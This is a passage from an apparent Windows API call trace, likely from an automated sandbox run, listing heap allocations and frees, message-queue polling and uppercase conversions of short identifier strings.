(HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0102.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0102.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0102.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0102.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0102.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0102.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0102.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0102.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0102.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0102.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0102.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0102.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0102.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0102.687] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0102.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0102.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0102.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0102.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0102.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0102.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0102.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0102.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0102.687] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0102.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0102.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0102.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0102.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0102.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0102.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0102.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0102.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0102.687] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0102.687] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0102.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0102.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0102.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0102.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0102.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0102.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0102.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0102.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0102.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0102.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0102.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0102.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0102.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0102.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0102.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0102.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0102.688] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0102.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0102.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0102.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0102.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0102.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0102.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0102.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0102.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0102.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0102.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0102.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0102.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0102.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0102.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0102.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0102.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0102.688] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0102.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0102.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0102.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0102.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0102.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0102.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0102.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0102.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0102.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0102.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0102.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0102.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0102.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0102.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0102.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0102.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0102.689] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0102.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0102.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0102.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0102.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0102.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0102.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0102.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0102.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0102.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0102.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0102.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0102.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0102.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0102.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0102.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0102.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0102.690] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0102.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0102.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0102.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0102.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0102.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0102.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0102.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0102.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0102.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0102.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0102.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0102.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0102.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0102.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0102.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0102.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0102.691] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0102.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0102.691] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0102.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0102.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0102.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b38 [0102.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0102.691] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0102.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0102.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0102.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0102.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0102.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0102.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0102.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0102.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0102.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0102.691] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0102.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0102.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0102.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0102.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0102.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0102.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0102.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0102.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0102.692] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0102.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0102.692] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0102.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0102.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0102.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0102.692] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0102.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0102.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0102.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9940 [0102.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a745e0 [0102.692] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0102.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0102.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0102.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0102.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0102.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0102.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0102.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0102.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0102.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0102.692] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0102.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0102.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0102.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0102.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0102.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0102.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0102.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0102.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0102.693] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0102.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0102.693] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0102.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0102.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0102.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0102.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0102.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0102.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0102.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0102.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0102.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0102.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0102.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0102.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0102.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a745e0 | out: hHeap=0x2af0000) returned 1 [0102.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0102.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0102.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0102.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0102.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0102.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0102.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0102.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0102.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0102.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0102.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0102.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0102.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0102.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0102.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0102.694] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0102.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0102.694] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0102.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0102.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0102.694] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0102.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0102.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0102.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9940 [0102.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74118 [0102.694] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0102.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0102.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0102.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0102.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0102.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0102.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0102.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0102.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0102.694] RtlAllocateHeap 